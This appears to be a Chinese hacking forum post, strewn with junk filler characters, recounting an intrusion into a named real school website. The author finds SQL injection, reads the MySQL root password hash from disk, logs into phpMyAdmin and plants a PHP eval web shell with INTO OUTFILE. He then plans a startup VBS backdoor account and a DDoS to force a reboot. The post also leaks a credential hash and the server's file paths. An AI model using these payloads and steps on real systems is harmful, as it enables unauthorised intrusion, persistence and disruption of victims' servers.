第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
J n/ x, S: m9 o* i. _% O/ X$ o发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
+ s4 a# [, W w y! d; l5 s7 V9 b, g1 G+ a
/ Y \ X7 Z* P& p1 Y) n. x
: Y5 |$ f9 D8 `# t) C常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
3 [. s) L. W: P& _5 R5 T+ C* q( W
3 {" ^' L) u. ^- n那么想可以直接写入shell ,getshell有几个条件:& o" Y* e) F: l2 E6 g8 C5 a
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
0 |7 d3 ^+ z+ j, h
; ~' Q; u7 x, i+ A: X1 v- U2 }试着爆绝对路径: 5 |6 D, i9 y; w3 Q+ l% j
1./phpMyAdmin/index.php?lang[]=1
* j: d% Z; s: J2./phpMyAdmin/phpinfo.php 7 C0 y0 I" f$ A, Z5 z) T* ~
3./load_file() . _9 `& a9 O0 K+ ]& S
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
' ~2 U" |0 M1 c5./phpmyadmin/libraries/select_lang.lib.php
: o" U$ _0 k9 s! R5 d( a) |6./phpmyadmin/libraries/lect_lang.lib.php " B7 k/ [/ Z5 Z$ W+ c
7./phpmyadmin/libraries/mcrypt.lib.php : N" v% X3 |; R( _6 K' M
8./phpmyadmin/libraries/export/xls.php
% }' d7 `! ?! }/ L' ^% y5 u
5 A" w1 E4 J$ A# t) Q" f均不行........................... ^ i8 M' W7 u1 Y2 z2 I
7 d1 o @+ b1 Q7 l) n- W御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
. ]9 j3 K5 R3 X* G! C
. m9 E; ^$ M/ o权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
* a3 Z, r3 \6 y& @$ ]# o7 X
$ H3 M2 L" ~4 @+ {# U, \# K) S默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
" Z0 m n; F: f( c H! C4 g
- z+ x/ i. ]" A7 b, P敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... * M2 @" ?2 q8 h
5 F0 Q3 A! r! k" Y# L+ }想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 3 Z4 c9 b0 f1 Z1 s/ e2 r- r6 T
1 _: \: ^7 }5 h* |9 | l2 A
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini # X7 H9 X/ y5 l1 L
- r, E' T5 O4 _! W1 @6 n
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ' j0 \ e: L% f( D
# Y5 C$ G! n6 b; }7 [成功读到root密码:
# f! \. O, Y* ?8 ?- d8 z: P( _$ g
: |% L1 X0 ^1 ^) ~; i17---- r(0072)
' ~* _8 z! {+ n7 w+ ]4 ]7 `18---- o(006f)
+ J M8 ~* S( t9 b9 S# _. o/ ]19---- o(006f) & {. u/ V' A4 m) j' Q" ^" j4 p
20---- t(0074)
2 c- D' K6 A5 M9 J4 ?21---- *(002a)
- G9 I+ w# Q9 [0 h f22---- 8(0038) + x! c4 I. @6 W1 x6 Z$ l- z
23---- 2(0032) . q6 M+ ]0 Q/ [4 l5 H/ v3 E% S! n
24---- E(0045) 8 w4 i% J! A: c, M
25---- 1(0031) - V; l1 i* c4 c2 h; b" S4 Z8 H# M
26---- C(0043)
3 ~8 i/ i& g/ a( w& T* K) z1 L27---- 5(0035) * \* `$ d; I& ]) [. H( r4 K4 Y
28---- 8(0038)
" s& i) N, Z" u* v3 }9 m29---- 2(0032) E' j& [' C7 \) ]1 g, k& {% l- O/ n
30---- 8(0038)
9 i# k# U4 X5 B. K31---- A(0041) : ?: ?0 H4 @6 z( w4 M5 A. [
32---- 9(0039)
/ \8 N" V2 V& ]$ v9 H+ P8 I2 |+ n# G4 A33---- B(0042)
4 t/ K7 |+ y: s! y& r+ A/ c34---- 5(0035)
S8 |" ~3 `3 d+ B35---- 4(0034) 5 a* z0 Y/ L1 i0 v, `: t a3 ^, P
36---- 8(0038) 9 s# K- |+ W8 { |- \. q5 p
37---- 6(0036)
+ }7 q3 C8 {4 H5 g38---- 4(0034)
2 Z+ n* O3 S- ~39---- 9(0039) 5 Z1 j& p# O V+ |
40---- 1(0031)
4 o! o9 T5 m& G9 d1 f% l% k+ E41---- 1(0031) ! l2 v% ]2 t; z9 n! T# ]
42---- 5(0035) & t& c: d1 y7 J- ]
43---- 3(0033) 1 D4 j& M R. f& H# u( ~
44---- 5(0035) * n5 m: @ h, K1 Y# n% n* B
45---- 9(0039)
* C' b" n* | G' M V+ n" ^. B; _ q46---- 8(0038) " }9 Q1 @ |' @2 `! ~! L8 C1 p" u B$ j- Y
47---- F(0046)
9 e, R/ ?# s1 c# t48---- F(0046) # l+ g B4 l1 ?8 S
49---- 4(0034) % j- C7 ?- x- K4 k( J; g K
50---- F(0046)
5 r( V* a& K# Z5 ]51---- 0(0030)
: `- D! g: J1 F52---- 3(0033) 3 @ n6 l1 C2 D6 ]$ W0 N3 K9 {
53---- 2(0032) & A( t7 l% x/ c2 ]$ }; ]% {
54---- A(0041) ' s; v0 {& U$ u) k" `
55---- 4(0034) 9 Z' k0 O. F( z, v2 I
56---- A(0041) 7 Q3 ^1 H5 \( m) U) h
57---- B(0042) 7 H5 Z. ?2 t, w1 s" j
58---- *(0044) $ D$ B% H. L8 R0 P* i/ W- X" r
59---- *(0035)
f( ?% e. n M: ]60---- *(0041)
4 f. h9 ^/ |# Z5 [- `61---- *0032) ) M1 [9 K, N& J. n |1 E, M4 H
9 C$ A( C1 M% z; Q1 r# V# J: ~
解密后成功登陆phpmyamin
; x4 F( I9 x' _; J. c
# }' Y7 G) S8 X6 K% V2 Y8 H8 n/ Z. [; H
9 ] x0 g5 T# X
! F0 \; [8 U. W
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
, W% b$ y. a0 t& n/ h( `
0 j9 F2 f P a& [( e9 O- t, F成功执行,拿下shell,菜刀连接: ( n' h- a# s9 Z4 @& Q. W! i( r
3 X Z9 `0 R; ~5 y# `, b服务器不支持asp,aspx,php提权无果...................
# M) c( y' G8 u% t( \
, z, |; ~5 Q4 q- J7 D但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: ! q8 v8 W5 a6 p* t
服务器上已经有个隐藏帐号了
, W6 \) \4 G% b, T% _别名 administrators4 O* o$ c; @0 @. M" [2 @, r
注释 管理员对计算机/域有不受限制的完全访问权 ( B; ^ k3 c0 z" _. ]- r6 P
成员 3 m( W9 K6 r3 w# I8 O
-------------------------------------------------------------------------------. @ B/ K/ M- p' e* g* i
admin5 \8 L8 a+ ?! G
Administrator4 T r. |, e# `" D# t
slipper$5 v! K" W3 d1 G$ T; ^9 P/ y" D: X
sqluser; [0 I/ R; h% C2 Z
命令成功完成。 ; G1 @" t7 |2 K( T J
) N/ N* K O; \
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
$ L! A [7 a4 a0 I) k; ]$ K8 K
; s1 T$ p3 J ]! H4 oddos服务器重启,不然就只能坐等服务器重启了...............................( L% A8 t7 _/ q: p7 a1 V
( A1 w, w0 E7 n8 m( _
: }# M2 M9 c. m* @
|